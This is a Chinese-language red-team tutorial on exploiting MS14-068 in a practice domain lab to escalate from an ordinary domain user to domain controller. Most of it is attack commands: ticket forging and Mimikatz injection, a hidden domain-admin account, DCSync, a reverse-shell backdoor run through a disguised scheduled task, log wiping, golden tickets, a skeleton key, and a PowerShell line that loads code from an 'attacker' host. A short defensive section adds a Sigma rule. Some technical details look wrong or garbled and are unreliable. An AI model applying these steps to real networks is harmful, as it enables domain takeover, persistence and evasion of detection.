ATTCK 红日4靶场 MS14-068 域提权:从普通域用户到域控的 2 步票据伪造
ATTCK红队实战MS14-068漏洞的深度利用与域控提权艺术1. 漏洞背景与攻击面分析MS14-068CVE-2014-6324是微软Kerberos协议实现中的一个关键漏洞它从根本上动摇了Active Directory域环境的安全基础。这个漏洞的特殊性在于PAC验证绕过Kerberos协议中的特权属性证书PAC验证存在逻辑缺陷权限提升本质允许普通域用户伪造高权限票据直接获取域管理员权限影响范围所有未安装KB3011780补丁的Windows域控制器在红日靶场4的环境中攻击者已经通过前期渗透获取了以下关键信息域成员账号douser/Dotest123域控制器IP192.168.75.135用户SIDS-1-5-21-979886063-1111900045-1414766810-11072. 漏洞利用条件验证在实施攻击前必须确认环境满足以下必要条件# 检查域控补丁状态通过已控主机间接验证 systeminfo | find KB3011780 # 若无返回结果则表示漏洞存在 # 验证基础域信息 nltest /dsgetdc:demo.com关键验证点表格检查项有效值验证方法域账号有效性已知有效凭证net use \\dc01域控可达性能解析并连通ping WIN-ENS2VR5TR3NSID准确性匹配用户身份whoami /all补丁状态未安装KB3011780间接验证3. 票据伪造实战操作3.1 生成伪造票据使用MS14-068.exe工具生成黄金票据# 票据生成命令模板 MS14-068.exe -u usernamedomain -s user_sid -d dc_ip -p password # 实际执行示例 MS14-068.exe -u douserDEMO.com -s S-1-5-21-979886063-1111900045-1414766810-1107 -d 192.168.75.135 -p Dotest123成功执行后将生成TGT_douserDEMO.com.ccache文件这是包含域管理员权限的伪造票据。3.2 票据注入技术使用Mimikatz进行票据注入的完整流程# 清除现有票据 mimikatz # kerberos::purge # 列出当前票据应为空 mimikatz # kerberos::list # 注入伪造票据 mimikatz # kerberos::ptc TGT_douserDEMO.com.ccache # 验证票据应显示伪造的TGT mimikatz # kerberos::list关键参数说明kerberos::purge清空当前会话的所有Kerberos票据kerberos::ptc将票据文件注入当前会话的内存4. 权限提升验证与利用4.1 基础权限验证# 测试域控访问权限 dir \\WIN-ENS2VR5TR3N\c$ # 验证网络共享访问 net use \\WIN-ENS2VR5TR3N\admin$4.2 高级利用技术方法一直接创建域管理员账户# 创建隐藏用户 net user hacker$ Pssw0rd /add /domain net group Domain Admins hacker$ /add /domain # 验证用户添加 net group Domain Admins /domain方法二DCSync攻击获取krbtgt哈希mimikatz # lsadump::dcsync /domain:demo.com /user:krbtgt方法三计划任务远程执行# 上传后门到域控 copy reverse.exe \\WIN-ENS2VR5TR3N\c$\windows\temp\ # 创建计划任务 schtasks /create /s WIN-ENS2VR5TR3N /ru SYSTEM /tn WindowsUpdate /tr c:\windows\temp\reverse.exe /sc daily /st 09:00 # 立即执行任务 schtasks /run /s WIN-ENS2VR5TR3N /tn WindowsUpdate5. 防御规避与痕迹清理5.1 日志清除技术# 清除安全日志 wevtutil cl Security # 清除指定事件ID powershell -c Get-EventLog -LogName Security | Where-Object {$_.EventID -eq 4769} | ForEach-Object {Remove-EventLog -InstanceId $_.InstanceId}5.2 隐蔽维持访问黄金票据生成mimikatz # kerberos::golden /user:Administrator /domain:demo.com /sid:S-1-5-21-979886063-1111900045-1414766810 /krbtgt:hash /pttSkeleton Key注入mimikatz # misc::skeleton6. 防御措施与检测方案6.1 企业防护策略补丁管理立即安装KB3011780补丁启用Windows自动更新服务权限控制# 限制普通用户的本地登录权限 secedit /configure /db secedit.sdb /cfg restrict-login.inf监控策略监控异常Kerberos票据请求事件ID 4769设置PAC验证失败的警报阈值6.2 检测技术示例Sigma检测规则示例title: MS14-068 Exploitation Attempt description: Detects possible MS14-068 exploitation logsource: product: windows service: security detection: selection: EventID: 4769 TicketEncryptionType: 0x17 condition: selection falsepositives: - Unknown level: high流量检测特征异常的Kerberos TGS-REQ请求频率PAC校验失败日志激增非标准加密类型0x17的使用7. 攻击演进与高级技巧7.1 无文件攻击变种# 内存加载MS14-068利用代码 $bytes (New-Object Net.WebClient).DownloadData(http://attacker/MS14-068.dll) $assembly [System.Reflection.Assembly]::Load($bytes) $instance New-Object MS14068.Exploit $instance.Execute(douser,DEMO.com,S-1-5-21...,192.168.75.135,Dotest123)7.2 结合其他漏洞的复合攻击# 通过PetitPotam触发NTLM中继 python3 petitpotam.py -d demo.com -u douser -p Dotest123 192.168.75.130 192.168.75.1357.3 跨域攻击路径graph TD A[普通域成员] --|MS14-068| B[域管理员权限] B --|DCSync| C[获取krbtgt哈希] C --|黄金票据| D[跨域持久化]8. 实战经验与疑难解答常见问题处理票据注入失败检查系统时间是否与域控同步误差不超过5分钟确认注入的SID包含完整的域SID而不仅是用户RID访问被拒绝# 检查Kerberos协议版本 klist # 强制更新票据 klist purge工具兼容性问题在Windows 7上使用兼容模式运行MS14-068.exe对于x64系统使用专门编译的版本性能优化技巧# 提高票据注入成功率 Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\Kerberos\Parameters -Name CloudKerberosTicketRetrievalEnabled -Value 09. 延伸攻击路径获得域控权限后安全工程师应重点关注以下攻击路径组策略对象篡改# 查看现有GPO Get-GPO -All # 创建恶意GPO New-GPO -Name Windows Update | New-GPLink -Target dcdemo,dccom证书服务攻击# 通过Certify请求域控证书 Certify.exe request /ca:dc.demo.com\demo-DC-CA /template:User信任关系滥用# 查询域信任关系 Get-ADTrust -Filter * # 提取信任域SID Get-ADDomain -Identity external.domain | select Sid10. 企业级防御架构建议分层防护策略网络层启用Kerberos armoringFAST配置防火墙规则限制域控的UDP88端口访问主机层# 启用PAC验证增强 Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\Kerberos\ -Name ValidateKdcPacSignature -Value 1监控层部署SIEM收集4768、4769、4771事件设置用户行为分析UEBA基线应急响应流程立即隔离受影响系统重置krbtgt账户密码两次间隔24小时全面审计域内账户权限变更轮换所有域账户凭据